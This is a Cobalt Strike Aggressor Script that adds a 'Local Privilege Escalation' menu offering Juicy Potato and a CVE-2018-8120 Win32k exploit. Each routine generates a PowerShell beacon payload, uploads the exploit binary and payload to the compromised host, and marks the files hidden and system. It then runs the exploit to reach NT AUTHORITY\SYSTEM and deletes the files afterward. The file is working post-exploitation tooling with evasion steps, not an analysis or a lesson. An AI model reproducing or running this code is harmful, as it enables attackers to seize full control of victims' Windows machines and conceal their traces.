#define functions


sub RunJuicyPotato{
    local('$payload $handle $call $port $id');
    $call = $3['Call'];
    $port = $3['Port'];
    $id = $3['CLSID'];
    if ($call eq "CreateProcessWithTokenW"){
        $call = "t";
    }
    else if($call eq "CreateProcessAsUser"){
        $call = "u";
    }
    else{
        $call = "\*";
    }
    if( !-isnumber $port){
        show_error("The port is not regular. Please enter the number in the range of 1-65535 !");
        return;
    }
    if(($port < 1) || ($port > 65535)){
        show_error("Port out of range !");
        return;
    }
    $payload = powershell($3['listener'], false);
    $handle = openf(">payload.cmd");
    writeb($handle, $payload);
    closef($handle);
    bupload($bid, script_resource("exp/jp/jp.exe"));
    bupload($bid, "payload.cmd");
    bshell($bid, "attrib \"jp.exe\" +s +h");
    bshell($bid, "attrib \"payload.cmd\" +s +h");
    bshell($bid,"jp.exe -t  $+ $call -l  $+ $port -p  $+ payload.cmd");
    bshell($bid,"del /F /S /Q /AH jp.exe");
}

sub CVE_2018_8120{
    local('$Rch $payload');
    $Rch = "x86";
    if (beacon_info($bid,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($3['listener'], false, $Rch);
    bupload($bid, script_resource("exp/8120/ $+ $Rch $+ .exe"));
    bshell($bid, "attrib \"$Rch $+ .exe\" +s +h");
    bshell($bid,"$Rch $+ .exe \"".$payload."\"");
    bshell($bid,"taskkill /f /im $Rch $+ .exe");
    bshell($bid,"del /F /S /Q /AH $Rch $+ .exe");
}

#append menus



    menu "Local Privilege Escalation"{
        item "Juicy-Potato"{
            $bid = $1['@'];
            $Dialog = dialog("Juicy Potato",%(Call =>"Both", Port => "1337", CLSID => "{4991d34b-80a1-4291-83b6-3328366b9097}", bid => $bid),&RunJuicyPotato);
            dialog_description($Dialog, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM. ");
            drow_listener($Dialog, "listener", "Listener: ");
            drow_combobox($Dialog, "Call",  "Createprocess Call: ", @("CreateProcessWithTokenW","CreateProcessAsUser","Both"));
            drow_text($Dialog, "Port", "Listen Port: ");
            drow_text($Dialog, "CLSID", "CLSID: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }

        item "CVE-2018-8120"{
            $bid = $1['@'];
            $Dialog = dialog("CVE-2018-8120",%(bid => $bid),&CVE_2018_8120);
            dialog_description($Dialog, "when the Win32k component fails to properly handle objects in memory\, aka \"Win32k Elevation of Privilege Vulnerability.\"");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }
    }